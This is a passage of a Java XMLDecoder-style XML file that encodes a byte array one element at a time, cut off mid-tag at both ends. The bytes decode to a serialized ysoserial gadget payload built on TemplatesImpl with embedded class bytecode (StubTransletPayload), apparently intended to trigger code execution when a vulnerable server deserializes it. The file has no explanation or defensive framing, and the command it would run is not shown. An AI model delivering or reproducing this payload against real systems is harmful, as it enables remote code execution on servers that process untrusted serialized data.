index=\"72\"><byte>0</byte></void><void index=\"73\"><byte>0</byte></void><void index=\"74\"><byte>120</byte></void><void index=\"75\"><byte>112</byte></void><void index=\"76\"><byte>119</byte></void><void index=\"77\"><byte>12</byte></void><void index=\"78\"><byte>0</byte></void><void index=\"79\"><byte>0</byte></void><void index=\"80\"><byte>0</byte></void><void index=\"81\"><byte>16</byte></void><void index=\"82\"><byte>63</byte></void><void index=\"83\"><byte>64</byte></void><void index=\"84\"><byte>0</byte></void><void index=\"85\"><byte>0</byte></void><void index=\"86\"><byte>0</byte></void><void index=\"87\"><byte>0</byte></void><void index=\"88\"><byte>0</byte></void><void index=\"89\"><byte>2</byte></void><void index=\"90\"><byte>115</byte></void><void index=\"91\"><byte>114</byte></void><void index=\"92\"><byte>0</byte></void><void index=\"93\"><byte>58</byte></void><void index=\"94\"><byte>99</byte></void><void index=\"95\"><byte>111</byte></void><void index=\"96\"><byte>109</byte></void><void index=\"97\"><byte>46</byte></void><void index=\"98\"><byte>115</byte></void><void index=\"99\"><byte>117</byte></void><void index=\"100\"><byte>110</byte></void><void index=\"101\"><byte>46</byte></void><void index=\"102\"><byte>111</byte></void><void index=\"103\"><byte>114</byte></void><void index=\"104\"><byte>103</byte></void><void index=\"105\"><byte>46</byte></void><void index=\"106\"><byte>97</byte></void><void index=\"107\"><byte>112</byte></void><void index=\"108\"><byte>97</byte></void><void index=\"109\"><byte>99</byte></void><void index=\"110\"><byte>104</byte></void><void index=\"111\"><byte>101</byte></void><void index=\"112\"><byte>46</byte></void><void index=\"113\"><byte>120</byte></void><void index=\"114\"><byte>97</byte></void><void index=\"115\"><byte>108</byte></void><void index=\"116\"><byte>97</byte></void><void index=\"117\"><byte>110</byte></void><void index=\"118\"><byte>46</byte></void><void index=\"119\"><byte>105</byte></void><void index=\"120\"><byte>110</byte></void><void index=\"121\"><byte>116</byte></void><void index=\"122\"><byte>101</byte></void><void index=\"123\"><byte>114</byte></void><void index=\"124\"><byte>110</byte></void><void index=\"125\"><byte>97</byte></void><void index=\"126\"><byte>108</byte></void><void index=\"127\"><byte>46</byte></void><void index=\"128\"><byte>120</byte></void><void index=\"129\"><byte>115</byte></void><void index=\"130\"><byte>108</byte></void><void index=\"131\"><byte>116</byte></void><void index=\"132\"><byte>99</byte></void><void index=\"133\"><byte>46</byte></void><void index=\"134\"><byte>116</byte></void><void index=\"135\"><byte>114</byte></void><void index=\"136\"><byte>97</byte></void><void index=\"137\"><byte>120</byte></void><void index=\"138\"><byte>46</byte></void><void index=\"139\"><byte>84</byte></void><void index=\"140\"><byte>101</byte></void><void index=\"141\"><byte>109</byte></void><void index=\"142\"><byte>112</byte></void><void index=\"143\"><byte>108</byte></void><void index=\"144\"><byte>97</byte></void><void index=\"145\"><byte>116</byte></void><void index=\"146\"><byte>101</byte></void><void index=\"147\"><byte>115</byte></void><void index=\"148\"><byte>73</byte></void><void index=\"149\"><byte>109</byte></void><void index=\"150\"><byte>112</byte></void><void index=\"151\"><byte>108</byte></void><void index=\"152\"><byte>9</byte></void><void index=\"153\"><byte>87</byte></void><void index=\"154\"><byte>79</byte></void><void index=\"155\"><byte>-63</byte></void><void index=\"156\"><byte>110</byte></void><void index=\"157\"><byte>-84</byte></void><void index=\"158\"><byte>-85</byte></void><void index=\"159\"><byte>51</byte></void><void index=\"160\"><byte>3</byte></void><void index=\"161\"><byte>0</byte></void><void index=\"162\"><byte>9</byte></void><void index=\"163\"><byte>73</byte></void><void index=\"164\"><byte>0</byte></void><void index=\"165\"><byte>13</byte></void><void index=\"166\"><byte>95</byte></void><void index=\"167\"><byte>105</byte></void><void index=\"168\"><byte>110</byte></void><void index=\"169\"><byte>100</byte></void><void index=\"170\"><byte>101</byte></void><void index=\"171\"><byte>110</byte></void><void index=\"172\"><byte>116</byte></void><void index=\"173\"><byte>78</byte></void><void index=\"174\"><byte>117</byte></void><void index=\"175\"><byte>109</byte></void><void index=\"176\"><byte>98</byte></void><void index=\"177\"><byte>101</byte></void><void index=\"178\"><byte>114</byte></void><void index=\"179\"><byte>73</byte></void><void index=\"180\"><byte>0</byte></void><void index=\"181\"><byte>14</byte></void><void index=\"182\"><byte>95</byte></void><void index=\"183\"><byte>116</byte></void><void index=\"184\"><byte>114</byte></void><void index=\"185\"><byte>97</byte></void><void index=\"186\"><byte>110</byte></void><void index=\"187\"><byte>115</byte></void><void index=\"188\"><byte>108</byte></void><void index=\"189\"><byte>101</byte></void><void index=\"190\"><byte>116</byte></void><void index=\"191\"><byte>73</byte></void><void index=\"192\"><byte>110</byte></void><void index=\"193\"><byte>100</byte></void><void index=\"194\"><byte>101</byte></void><void index=\"195\"><byte>120</byte></void><void index=\"196\"><byte>90</byte></void><void index=\"197\"><byte>0</byte></void><void index=\"198\"><byte>21</byte></void><void index=\"199\"><byte>95</byte></void><void index=\"200\"><byte>117</byte></void><void index=\"201\"><byte>115</byte></void><void index=\"202\"><byte>101</byte></void><void index=\"203\"><byte>83</byte></void><void index=\"204\"><byte>101</byte></void><void index=\"205\"><byte>114</byte></void><void index=\"206\"><byte>118</byte></void><void index=\"207\"><byte>105</byte></void><void index=\"208\"><byte>99</byte></void><void index=\"209\"><byte>101</byte></void><void index=\"210\"><byte>115</byte></void><void index=\"211\"><byte>77</byte></void><void index=\"212\"><byte>101</byte></void><void index=\"213\"><byte>99</byte></void><void index=\"214\"><byte>104</byte></void><void index=\"215\"><byte>97</byte></void><void index=\"216\"><byte>110</byte></void><void index=\"217\"><byte>105</byte></void><void index=\"218\"><byte>115</byte></void><void index=\"219\"><byte>109</byte></void><void index=\"220\"><byte>76</byte></void><void index=\"221\"><byte>0</byte></void><void index=\"222\"><byte>25</byte></void><void index=\"223\"><byte>95</byte></void><void index=\"224\"><byte>97</byte></void><void index=\"225\"><byte>99</byte></void><void index=\"226\"><byte>99</byte></void><void index=\"227\"><byte>101</byte></void><void index=\"228\"><byte>115</byte></void><void index=\"229\"><byte>115</byte></void><void index=\"230\"><byte>69</byte></void><void index=\"231\"><byte>120</byte></void><void index=\"232\"><byte>116</byte></void><void index=\"233\"><byte>101</byte></void><void index=\"234\"><byte>114</byte></void><void index=\"235\"><byte>110</byte></void><void index=\"236\"><byte>97</byte></void><void index=\"237\"><byte>108</byte></void><void index=\"238\"><byte>83</byte></void><void index=\"239\"><byte>116</byte></void><void index=\"240\"><byte>121</byte></void><void index=\"241\"><byte>108</byte></void><void index=\"242\"><byte>101</byte></void><void index=\"243\"><byte>115</byte></void><void index=\"244\"><byte>104</byte></void><void index=\"245\"><byte>101</byte></void><void index=\"246\"><byte>101</byte></void><void index=\"247\"><byte>116</byte></void><void index=\"248\"><byte>116</byte></void><void index=\"249\"><byte>0</byte></void><void index=\"250\"><byte>18</byte></void><void index=\"251\"><byte>76</byte></void><void index=\"252\"><byte>106</byte></void><void index=\"253\"><byte>97</byte></void><void index=\"254\"><byte>118</byte></void><void index=\"255\"><byte>97</byte></void><void index=\"256\"><byte>47</byte></void><void index=\"257\"><byte>108</byte></void><void index=\"258\"><byte>97</byte></void><void index=\"259\"><byte>110</byte></void><void index=\"260\"><byte>103</byte></void><void index=\"261\"><byte>47</byte></void><void index=\"262\"><byte>83</byte></void><void index=\"263\"><byte>116</byte></void><void index=\"264\"><byte>114</byte></void><void index=\"265\"><byte>105</byte></void><void index=\"266\"><byte>110</byte></void><void index=\"267\"><byte>103</byte></void><void index=\"268\"><byte>59</byte></void><void index=\"269\"><byte>76</byte></void><void index=\"270\"><byte>0</byte></void><void index=\"271\"><byte>11</byte></void><void index=\"272\"><byte>95</byte></void><void index=\"273\"><byte>97</byte></void><void index=\"274\"><byte>117</byte></void><void index=\"275\"><byte>120</byte></void><void index=\"276\"><byte>67</byte></void><void index=\"277\"><byte>108</byte></void><void index=\"278\"><byte>97</byte></void><void index=\"279\"><byte>115</byte></void><void index=\"280\"><byte>115</byte></void><void index=\"281\"><byte>101</byte></void><void index=\"282\"><byte>115</byte></void><void index=\"283\"><byte>116</byte></void><void index=\"284\"><byte>0</byte></void><void index=\"285\"><byte>59</byte></void><void index=\"286\"><byte>76</byte></void><void index=\"287\"><byte>99</byte></void><void index=\"288\"><byte>111</byte></void><void index=\"289\"><byte>109</byte></void><void index=\"290\"><byte>47</byte></void><void index=\"291\"><byte>115</byte></void><void index=\"292\"><byte>117</byte></void><void index=\"293\"><byte>110</byte></void><void index=\"294\"><byte>47</byte></void><void index=\"295\"><byte>111</byte></void><void index=\"296\"><byte>114</byte></void><void index=\"297\"><byte>103</byte></void><void index=\"298\"><byte>47</byte></void><void index=\"299\"><byte>97</byte></void><void index=\"300\"><byte>112</byte></void><void index=\"301\"><byte>97</byte></void><void index=\"302\"><byte>99</byte></void><void index=\"303\"><byte>104</byte></void><void index=\"304\"><byte>101</byte></void><void index=\"305\"><byte>47</byte></void><void index=\"306\"><byte>120</byte></void><void index=\"307\"><byte>97</byte></void><void index=\"308\"><byte>108</byte></void><void index=\"309\"><byte>97</byte></void><void index=\"310\"><byte>110</byte></void><void index=\"311\"><byte>47</byte></void><void index=\"312\"><byte>105</byte></void><void index=\"313\"><byte>110</byte></void><void index=\"314\"><byte>116</byte></void><void index=\"315\"><byte>101</byte></void><void index=\"316\"><byte>114</byte></void><void index=\"317\"><byte>110</byte></void><void index=\"318\"><byte>97</byte></void><void index=\"319\"><byte>108</byte></void><void index=\"320\"><byte>47</byte></void><void index=\"321\"><byte>120</byte></void><void index=\"322\"><byte>115</byte></void><void index=\"323\"><byte>108</byte></void><void index=\"324\"><byte>116</byte></void><void index=\"325\"><byte>99</byte></void><void index=\"326\"><byte>47</byte></void><void index=\"327\"><byte>114</byte></void><void index=\"328\"><byte>117</byte></void><void index=\"329\"><byte>110</byte></void><void index=\"330\"><byte>116</byte></void><void index=\"331\"><byte>105</byte></void><void index=\"332\"><byte>109</byte></void><void index=\"333\"><byte>101</byte></void><void index=\"334\"><byte>47</byte></void><void index=\"335\"><byte>72</byte></void><void index=\"336\"><byte>97</byte></void><void index=\"337\"><byte>115</byte></void><void index=\"338\"><byte>104</byte></void><void index=\"339\"><byte>116</byte></void><void index=\"340\"><byte>97</byte></void><void index=\"341\"><byte>98</byte></void><void index=\"342\"><byte>108</byte></void><void index=\"343\"><byte>101</byte></void><void index=\"344\"><byte>59</byte></void><void index=\"345\"><byte>91</byte></void><void index=\"346\"><byte>0</byte></void><void index=\"347\"><byte>10</byte></void><void index=\"348\"><byte>95</byte></void><void index=\"349\"><byte>98</byte></void><void index=\"350\"><byte>121</byte></void><void index=\"351\"><byte>116</byte></void><void index=\"352\"><byte>101</byte></void><void index=\"353\"><byte>99</byte></void><void index=\"354\"><byte>111</byte></void><void index=\"355\"><byte>100</byte></void><void index=\"356\"><byte>101</byte></void><void index=\"357\"><byte>115</byte></void><void index=\"358\"><byte>116</byte></void><void index=\"359\"><byte>0</byte></void><void index=\"360\"><byte>3</byte></void><void index=\"361\"><byte>91</byte></void><void index=\"362\"><byte>91</byte></void><void index=\"363\"><byte>66</byte></void><void index=\"364\"><byte>91</byte></void><void index=\"365\"><byte>0</byte></void><void index=\"366\"><byte>6</byte></void><void index=\"367\"><byte>95</byte></void><void index=\"368\"><byte>99</byte></void><void index=\"369\"><byte>108</byte></void><void index=\"370\"><byte>97</byte></void><void index=\"371\"><byte>115</byte></void><void index=\"372\"><byte>115</byte></void><void index=\"373\"><byte>116</byte></void><void index=\"374\"><byte>0</byte></void><void index=\"375\"><byte>18</byte></void><void index=\"376\"><byte>91</byte></void><void index=\"377\"><byte>76</byte></void><void index=\"378\"><byte>106</byte></void><void index=\"379\"><byte>97</byte></void><void index=\"380\"><byte>118</byte></void><void index=\"381\"><byte>97</byte></void><void index=\"382\"><byte>47</byte></void><void index=\"383\"><byte>108</byte></void><void index=\"384\"><byte>97</byte></void><void index=\"385\"><byte>110</byte></void><void index=\"386\"><byte>103</byte></void><void index=\"387\"><byte>47</byte></void><void index=\"388\"><byte>67</byte></void><void index=\"389\"><byte>108</byte></void><void index=\"390\"><byte>97</byte></void><void index=\"391\"><byte>115</byte></void><void index=\"392\"><byte>115</byte></void><void index=\"393\"><byte>59</byte></void><void index=\"394\"><byte>76</byte></void><void index=\"395\"><byte>0</byte></void><void index=\"396\"><byte>5</byte></void><void index=\"397\"><byte>95</byte></void><void index=\"398\"><byte>110</byte></void><void index=\"399\"><byte>97</byte></void><void index=\"400\"><byte>109</byte></void><void index=\"401\"><byte>101</byte></void><void index=\"402\"><byte>113</byte></void><void index=\"403\"><byte>0</byte></void><void index=\"404\"><byte>126</byte></void><void index=\"405\"><byte>0</byte></void><void index=\"406\"><byte>4</byte></void><void index=\"407\"><byte>76</byte></void><void index=\"408\"><byte>0</byte></void><void index=\"409\"><byte>17</byte></void><void index=\"410\"><byte>95</byte></void><void index=\"411\"><byte>111</byte></void><void index=\"412\"><byte>117</byte></void><void index=\"413\"><byte>116</byte></void><void index=\"414\"><byte>112</byte></void><void index=\"415\"><byte>117</byte></void><void index=\"416\"><byte>116</byte></void><void index=\"417\"><byte>80</byte></void><void index=\"418\"><byte>114</byte></void><void index=\"419\"><byte>111</byte></void><void index=\"420\"><byte>112</byte></void><void index=\"421\"><byte>101</byte></void><void index=\"422\"><byte>114</byte></void><void index=\"423\"><byte>116</byte></void><void index=\"424\"><byte>105</byte></void><void index=\"425\"><byte>101</byte></void><void index=\"426\"><byte>115</byte></void><void index=\"427\"><byte>116</byte></void><void index=\"428\"><byte>0</byte></void><void index=\"429\"><byte>22</byte></void><void index=\"430\"><byte>76</byte></void><void index=\"431\"><byte>106</byte></void><void index=\"432\"><byte>97</byte></void><void index=\"433\"><byte>118</byte></void><void index=\"434\"><byte>97</byte></void><void index=\"435\"><byte>47</byte></void><void index=\"436\"><byte>117</byte></void><void index=\"437\"><byte>116</byte></void><void index=\"438\"><byte>105</byte></void><void index=\"439\"><byte>108</byte></void><void index=\"440\"><byte>47</byte></void><void index=\"441\"><byte>80</byte></void><void index=\"442\"><byte>114</byte></void><void index=\"443\"><byte>111</byte></void><void index=\"444\"><byte>112</byte></void><void index=\"445\"><byte>101</byte></void><void index=\"446\"><byte>114</byte></void><void index=\"447\"><byte>116</byte></void><void index=\"448\"><byte>105</byte></void><void index=\"449\"><byte>101</byte></void><void index=\"450\"><byte>115</byte></void><void index=\"451\"><byte>59</byte></void><void index=\"452\"><byte>120</byte></void><void index=\"453\"><byte>112</byte></void><void index=\"454\"><byte>0</byte></void><void index=\"455\"><byte>0</byte></void><void index=\"456\"><byte>0</byte></void><void index=\"457\"><byte>0</byte></void><void index=\"458\"><byte>-1</byte></void><void index=\"459\"><byte>-1</byte></void><void index=\"460\"><byte>-1</byte></void><void index=\"461\"><byte>-1</byte></void><void index=\"462\"><byte>0</byte></void><void index=\"463\"><byte>116</byte></void><void index=\"464\"><byte>0</byte></void><void index=\"465\"><byte>3</byte></void><void index=\"466\"><byte>97</byte></void><void index=\"467\"><byte>108</byte></void><void index=\"468\"><byte>108</byte></void><void index=\"469\"><byte>112</byte></void><void index=\"470\"><byte>117</byte></void><void index=\"471\"><byte>114</byte></void><void index=\"472\"><byte>0</byte></void><void index=\"473\"><byte>3</byte></void><void index=\"474\"><byte>91</byte></void><void index=\"475\"><byte>91</byte></void><void index=\"476\"><byte>66</byte></void><void index=\"477\"><byte>75</byte></void><void index=\"478\"><byte>-3</byte></void><void index=\"479\"><byte>25</byte></void><void index=\"480\"><byte>21</byte></void><void index=\"481\"><byte>103</byte></void><void index=\"482\"><byte>103</byte></void><void index=\"483\"><byte>-37</byte></void><void index=\"484\"><byte>55</byte></void><void index=\"485\"><byte>2</byte></void><void index=\"486\"><byte>0</byte></void><void index=\"487\"><byte>0</byte></void><void index=\"488\"><byte>120</byte></void><void index=\"489\"><byte>112</byte></void><void index=\"490\"><byte>0</byte></void><void index=\"491\"><byte>0</byte></void><void index=\"492\"><byte>0</byte></void><void index=\"493\"><byte>2</byte></void><void index=\"494\"><byte>117</byte></void><void index=\"495\"><byte>114</byte></void><void index=\"496\"><byte>0</byte></void><void index=\"497\"><byte>2</byte></void><void index=\"498\"><byte>91</byte></void><void index=\"499\"><byte>66</byte></void><void index=\"500\"><byte>-84</byte></void><void index=\"501\"><byte>-13</byte></void><void index=\"502\"><byte>23</byte></void><void index=\"503\"><byte>-8</byte></void><void index=\"504\"><byte>6</byte></void><void index=\"505\"><byte>8</byte></void><void index=\"506\"><byte>84</byte></void><void index=\"507\"><byte>-32</byte></void><void index=\"508\"><byte>2</byte></void><void index=\"509\"><byte>0</byte></void><void index=\"510\"><byte>0</byte></void><void index=\"511\"><byte>120</byte></void><void index=\"512\"><byte>112</byte></void><void index=\"513\"><byte>0</byte></void><void index=\"514\"><byte>0</byte></void><void index=\"515\"><byte>14</byte></void><void index=\"516\"><byte>29</byte></void><void index=\"517\"><byte>-54</byte></void><void index=\"518\"><byte>-2</byte></void><void index=\"519\"><byte>-70</byte></void><void index=\"520\"><byte>-66</byte></void><void index=\"521\"><byte>0</byte></void><void index=\"522\"><byte>0</byte></void><void index=\"523\"><byte>0</byte></void><void index=\"524\"><byte>50</byte></void><void index=\"525\"><byte>0</byte></void><void index=\"526\"><byte>-70</byte></void><void index=\"527\"><byte>10</byte></void><void index=\"528\"><byte>0</byte></void><void index=\"529\"><byte>3</byte></void><void index=\"530\"><byte>0</byte></void><void index=\"531\"><byte>34</byte></void><void index=\"532\"><byte>7</byte></void><void index=\"533\"><byte>0</byte></void><void index=\"534\"><byte>-72</byte></void><void index=\"535\"><byte>7</byte></void><void index=\"536\"><byte>0</byte></void><void index=\"537\"><byte>37</byte></void><void index=\"538\"><byte>7</byte></void><void index=\"539\"><byte>0</byte></void><void index=\"540\"><byte>38</byte></void><void index=\"541\"><byte>1</byte></void><void index=\"542\"><byte>0</byte></void><void index=\"543\"><byte>16</byte></void><void index=\"544\"><byte>115</byte></void><void index=\"545\"><byte>101</byte></void><void index=\"546\"><byte>114</byte></void><void index=\"547\"><byte>105</byte></void><void index=\"548\"><byte>97</byte></void><void index=\"549\"><byte>108</byte></void><void index=\"550\"><byte>86</byte></void><void index=\"551\"><byte>101</byte></void><void index=\"552\"><byte>114</byte></void><void index=\"553\"><byte>115</byte></void><void index=\"554\"><byte>105</byte></void><void index=\"555\"><byte>111</byte></void><void index=\"556\"><byte>110</byte></void><void index=\"557\"><byte>85</byte></void><void index=\"558\"><byte>73</byte></void><void index=\"559\"><byte>68</byte></void><void index=\"560\"><byte>1</byte></void><void index=\"561\"><byte>0</byte></void><void index=\"562\"><byte>1</byte></void><void index=\"563\"><byte>74</byte></void><void index=\"564\"><byte>1</byte></void><void index=\"565\"><byte>0</byte></void><void index=\"566\"><byte>13</byte></void><void index=\"567\"><byte>67</byte></void><void index=\"568\"><byte>111</byte></void><void index=\"569\"><byte>110</byte></void><void index=\"570\"><byte>115</byte></void><void index=\"571\"><byte>116</byte></void><void index=\"572\"><byte>97</byte></void><void index=\"573\"><byte>110</byte></void><void index=\"574\"><byte>116</byte></void><void index=\"575\"><byte>86</byte></void><void index=\"576\"><byte>97</byte></void><void index=\"577\"><byte>108</byte></void><void index=\"578\"><byte>117</byte></void><void index=\"579\"><byte>101</byte></void><void index=\"580\"><byte>5</byte></void><void index=\"581\"><byte>-83</byte></void><void index=\"582\"><byte>32</byte></void><void index=\"583\"><byte>-109</byte></void><void index=\"584\"><byte>-13</byte></void><void index=\"585\"><byte>-111</byte></void><void index=\"586\"><byte>-35</byte></void><void index=\"587\"><byte>-17</byte></void><void index=\"588\"><byte>62</byte></void><void index=\"589\"><byte>1</byte></void><void index=\"590\"><byte>0</byte></void><void index=\"591\"><byte>6</byte></void><void index=\"592\"><byte>60</byte></void><void index=\"593\"><byte>105</byte></void><void index=\"594\"><byte>110</byte></void><void index=\"595\"><byte>105</byte></void><void index=\"596\"><byte>116</byte></void><void index=\"597\"><byte>62</byte></void><void index=\"598\"><byte>1</byte></void><void index=\"599\"><byte>0</byte></void><void index=\"600\"><byte>3</byte></void><void index=\"601\"><byte>40</byte></void><void index=\"602\"><byte>41</byte></void><void index=\"603\"><byte>86</byte></void><void index=\"604\"><byte>1</byte></void><void index=\"605\"><byte>0</byte></void><void index=\"606\"><byte>4</byte></void><void index=\"607\"><byte>67</byte></void><void index=\"608\"><byte>111</byte></void><void index=\"609\"><byte>100</byte></void><void index=\"610\"><byte>101</byte></void><void index=\"611\"><byte>1</byte></void><void index=\"612\"><byte>0</byte></void><void index=\"613\"><byte>15</byte></void><void index=\"614\"><byte>76</byte></void><void index=\"615\"><byte>105</byte></void><void index=\"616\"><byte>110</byte></void><void index=\"617\"><byte>101</byte></void><void index=\"618\"><byte>78</byte></void><void index=\"619\"><byte>117</byte></void><void index=\"620\"><byte>109</byte></void><void index=\"621\"><byte>98</byte></void><void index=\"622\"><byte>101</byte></void><void index=\"623\"><byte>114</byte></void><void index=\"624\"><byte>84</byte></void><void index=\"625\"><byte>97</byte></void><void index=\"626\"><byte>98</byte></void><void index=\"627\"><byte>108</byte></void><void index=\"628\"><byte>101</byte></void><void index=\"629\"><byte>1</byte></void><void index=\"630\"><byte>0</byte></void><void index=\"631\"><byte>18</byte></void><void index=\"632\"><byte>76</byte></void><void index=\"633\"><byte>111</byte></void><void index=\"634\"><byte>99</byte></void><void index=\"635\"><byte>97</byte></void><void index=\"636\"><byte>108</byte></void><void index=\"637\"><byte>86</byte></void><void index=\"638\"><byte>97</byte></void><void index=\"639\"><byte>114</byte></void><void index=\"640\"><byte>105</byte></void><void index=\"641\"><byte>97</byte></void><void index=\"642\"><byte>98</byte></void><void index=\"643\"><byte>108</byte></void><void index=\"644\"><byte>101</byte></void><void index=\"645\"><byte>84</byte></void><void index=\"646\"><byte>97</byte></void><void index=\"647\"><byte>98</byte></void><void index=\"648\"><byte>108</byte></void><void index=\"649\"><byte>101</byte></void><void index=\"650\"><byte>1</byte></void><void index=\"651\"><byte>0</byte></void><void index=\"652\"><byte>4</byte></void><void index=\"653\"><byte>116</byte></void><void index=\"654\"><byte>104</byte></void><void index=\"655\"><byte>105</byte></void><void index=\"656\"><byte>115</byte></void><void index=\"657\"><byte>1</byte></void><void index=\"658\"><byte>0</byte></void><void index=\"659\"><byte>19</byte></void><void index=\"660\"><byte>83</byte></void><void index=\"661\"><byte>116</byte></void><void index=\"662\"><byte>117</byte></void><void index=\"663\"><byte>98</byte></void><void index=\"664\"><byte>84</byte></void><void index=\"665\"><byte>114</byte></void><void index=\"666\"><byte>97</byte></void><void index=\"667\"><byte>110</byte></void><void index=\"668\"><byte>115</byte></void><void index=\"669\"><byte>108</byte></void><void index=\"670\"><byte>101</byte></void><void index=\"671\"><byte>116</byte></void><void index=\"672\"><byte>80</byte></void><void index=\"673\"><byte>97</byte></void><void index=\"674\"><byte>121</byte></void><void index=\"675\"><byte>108</byte></void><void index=\"676\"><byte>111</byte></void><void index=\"677\"><byte>97</byte></void><void index=\"678\"><byte>100</byte></void><void index=\"679\"><byte>1</byte></void><void index=\"680\"><byte>0</byte></void><void index=\"681\"><byte>12</byte></void><void index=\"682\"><byte>73</byte></void><void index=\"683\"><byte>110</byte></void><void index=\"684\"><byte>110</byte></void><void index=\"685\"><byte>101</byte></void><void index=\"686\"><byte>114</byte></void><void index=\"687\"><byte>67</byte></void><void index=\"688\"><byte>108</byte></void><void index=\"689\"><byte>97</byte></void><void index=\"690\"><byte>115</byte></void><void index=\"691\"><byte>115</byte></void><void index=\"692\"><byte>101</byte></void><void index=\"693\"><byte>115</byte></void><void index=\"694\"><byte>1</byte></void><void index=\"695\"><byte>0</byte></void><void index=\"696\"><byte>53</byte></void><void index=\"697\"><byte>76</byte></void><void index=\"698\"><byte>121</byte></void><void index=\"699\"><byte>115</byte></void><void index=\"700\"><byte>111</byte></void><void index=\"701\"><byte>115</byte></void><void index=\"702\"><byte>101</byte></void><void index=\"703\"><byte>114</byte></void><void index=\"704\"><byte>105</byte></void><void index=\"705\"><byte>97</byte></void><void index=\"706\"><byte>108</byte></void><void index=\"707\"><byte>47</byte></void><void index=\"708\"><byte>112</byte></void><void index=\"709\"><byte>97</byte></void><void index=\"710\"><byte>121</byte></void><void index=\"711\"><byte>108</byte></void><void index=\"712\"><byte>111</byte></void><void index=\"713\"><byte>97</byte></void><void index=\"714\"><byte>100</byte></void><void index=\"715\"><byte>115</byte></void><void index=\"716\"><byte>47</byte></void><void index=\"717\"><byte>117</byte></void><void index=\"718\"><byte>116</byte></void><void index=\"719\"><byte>105</byte></void><void index=\"720\"><byte>108</byte></void><void index=\"721\"><byte>47</byte></void><void index=\"722\"><byte>71</byte></void><void index=\"723\"><byte>97</byte></void><void index=\"724\"><byte>100</byte></void><void index=\"725\"><byte>103</byte></void><void index=\"726\"><byte>101</byte></void><void index=\"727\"><byte>116</byte></void><void index=\"728\"><byte>115</byte></void><void index=\"729\"><byte>36</byte></void><void index=\"730\"><byte>83</byte></void><void index=\"731\"><byte>116</byte></void><void index=\"732\"><byte>117</byte></void><void index=\"733\"><byte>98</byte></void><void index=\"734\"><byte>84</byte></void><void index=\"735\"><byte>114</byte></void><void index=\"736\"><byte>97</byte></void><void index=\"737\"><byte>110</byte></void><void index=\"738\"><byte>115</byte></void><void index=\"739\"><byte>108</byte></void><void index=\"740\"><byte>101</byte></void><void index=\"741\"><byte>116</byte></void><void index=\"742\"><byte>80</byte></void><void index=\"743\"><byte>97</byte></void><void index=\"744\"><byte>121</byte></void><void index=\"745\"><byte>108</byte></void><void index=\"746\"><byte>111</byte></void><void index=\"747\"><byte>97</byte></void><void index=\"748\"><byte>100</byte></void><void index=\"749\"><byte>59</byte></void><void index=\"750\"><byte>1</byte></void><void index=\"751\"><byte>0</byte></void><void index=\"752\"><byte>9</byte></void><void index=\"753\"><byte>116</byte></void><void index=\"754\"><byte>114</byte></void><void index=\"755\"><byte>97</byte></void><void index=\"756\"><byte>110</byte></void><void index=\"757\"><byte>115</byte></void><void index=\"758\"><byte>102</byte></void><void index=\"759\"><byte>111</byte></void><void index=\"760\"><byte>114</byte></void><void index=\"761\"><byte>109</byte></void><void index=\"762\"><byte>1</byte></void><void index=\"763\"><byte>0</byte></void><void index=\"764\"><byte>114</byte></void><void index=\"765\"><byte>40</byte></void><void index=\"766\"><byte>76</byte></void><void index=\"767\"><byte>99</byte></void><void index=\"768\"><byte>111</byte></void><void index=\"769\"><byte>109</byte></void><void index=\"770\"><byte>47</byte></void><void index=\"771\"><byte>115</byte></void><void index=\"772\"><byte>117</byte></void><void index=\"773\"><byte>110</byte></void><void index=\"774\"><byte>47</byte></void><void index=\"775\"><byte>111</byte></void><void index=\"776\"><byte>114</byte></void><void index=\"777\"><byte>103</byte></void><void index=\"778\"><byte>47</byte></void><void index=\"779\"><byte>97</byte></void><void index=\"780\"><byte>112</byte></void><void index=\"781\"><byte>97</byte></void><void index=\"782\"><byte>99</byte></void><void index=\"783\"><byte>104</byte></void><void index=\"784\"><byte>101</byte></void><void index=\"785\"><byte>47</byte></void><void index=\"786\"><byte>120</byte></void><void index=\"787\"><byte>97</byte></void><void index=\"788\"><byte>108</byte></void><void index=\"789\"><byte>97</byte></void><void index=\"790\"><byte>110</byte></void><void index=\"791\"><byte>47</byte></void><void index=\"792\"><byte>105</byte></void><void index=\"793\"><byte>110</byte></void><void index=\"794\"><byte>116</byte></void><void index=\"795\"><byte>101</byte></void><void index=\"796\"><byte>114</byte></void><void index=\"797\"><byte>110</byte></void><void index=\"798\"><byte>97</byte></void><void index=\"799\"><byte>108</byte></void><void index=\"800\"><byte>47</byte></void><void index=\"801\"><byte>120</byte></void><void index=\"802\"><byte>115</byte></void><void index=\"803\"><byte>108</byte></void><void index=\"804\"><byte>116</byte></void><void index=\"805\"><byte>99</byte></void><void index=\"806\"><byte>47</byte></void><void index=\"807\"><byte>68</byte></void><void index=\"808\"><byte>79</byte></void><void index=\"809\"><byte>77</byte></void><void index=\"810\"><byte>59</byte></void><void index=\"811\"><byte>91</byte></void><void index=\"812\"><byte>76</byte></void><void index=\"813\"><byte>99</byte></void><void index=\"814\"><byte>111</byte></void><void index=\"815\"><byte>109</byte></void><void index=\"816\"><byte>47</byte></void><void index=\"817\"><byte>115</byte></void><void index=\"818\"><byte>117</byte></void><void index=\"819\"><byte>110</byte></void><void index=\"820\"><byte>47</byte></void><void index=\"821\"><byte>111</byte></void><void index=\"822\"><byte>114</byte></void><void index=\"823\"><byte>103</byte></void><void index=\"824\"><byte>47</byte></void><void index=\"825\"><byte>97</byte></void><void index=\"826\"><byte>112</byte></void><void index=\"827\"><byte>97</byte></void><void index=\"828\"><byte>99</byte></void><void index=\"829\"><byte>104</byte></void><void index=\"830\"><byte>101</byte></void><void index=\"831\"><byte>47</byte></void><void index=\"832\"><byte>120</byte></void><void index=\"833\"><byte>109</byte></void><void index=\"834\"><byte>108</byte></void><void index=\"835\"><byte>47</byte></void><void index=\"836\"><byte>105</byte></void><void index=\"837\"><byte>110</byte></void><void index=\"838\"><byte>116</byte></void><void index=\"839\"><byte>101</byte></void><void index=\"840\"><byte>114</byte></void><void index=\"841\"><byte>110</byte></void><void index=\"842\"><byte>97</byte></void><void index=\"843\"><byte>108</byte></void><void index=\"844\"><byte>47</byte></void><void index=\"845\"><byte>115</byte></void><void index=\"846\"><byte>101</byte></void><void index=\"847\"><byte>114</byte></void><void index=\"848\"><byte>105</byte></void><void index=\"849\"><byte>97</byte></void><void index=\"850\"><byte>108</byte></void><void index=\"851\"><byte>105</byte></void><void index=\"852\"><byte>122</byte></void><void index=\"853\"><byte>101</byte></void><void index=\"854\"><byte>114</byte></void><void index=\"855\"><byte>47</byte></void><void index=\"856\"><byte>83</byte></void><void index=\"857\"><byte>101</byte></void><void index=\"858\"><byte>114</byte></void><void index=\"859\"><byte>105</byte></void><void 